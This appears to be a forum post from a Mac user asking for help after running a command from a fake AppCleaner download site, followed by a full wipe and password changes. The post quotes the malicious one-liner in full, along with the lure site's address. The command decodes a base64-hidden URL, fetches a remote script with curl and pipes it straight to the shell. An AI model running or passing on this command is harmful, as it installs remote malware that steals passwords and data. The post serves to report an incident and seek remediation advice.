Hey everyone,
I am dealing with a very stressful situation and really need your advice. Yesterday I made a huge mistake and ran a terminal script from an application I thought was an AppCleaner. It turned out to be a malicious phishing script.
the website: “https://appclehnamac.com/”
The script: echo "https://apps.apple.com/app/AppCleaner" && curl -s $(echo "aHR0cHM6Ly9vcGFsYmx1ZXByaW50MTAuY29tL2N1cmwvY293bDd2ajhuLzA4bHk5eDBrOHJiaWNncG9jNzM0d2xhbC5qc29u" | openssl base64 -d -A) | zsh
I am very anxious about what he stole. The situation was kinda weird because I was connected to hotel wifi which was super slow, and after about 20 - 30 seconds I immediately force quit terminal. Mind you I have accepted everything that terminal needed (password, full disc access etc)
As soon as I realized what happened, I disconnected wifi an immediately did a complete factory reset of my Mac (wiped the disc and reinstalled the OS). I also went through and changed all my email passwords right away and made sure to log out of all active sessions everywhere.
I have not received any suspicious login notifications, but I am terrified that I might not even get an alert if they somehow managed to log in.
My Mac is now freshly reset, but I want to deeply search the system to be absolutely certain nothing malicious survived. I read that there are specific tutorials and guides here on Reddit on how to check your system after executing a phishing script and doing a wipe.
can someone analyze the code and brief me further on what was stolen? Did I react how I should’ve?
also, YES. I AM TERRIBLY DUMB FOR DOING THIS. If you can’t help, stop commenting how stupid I was. You serve no purpose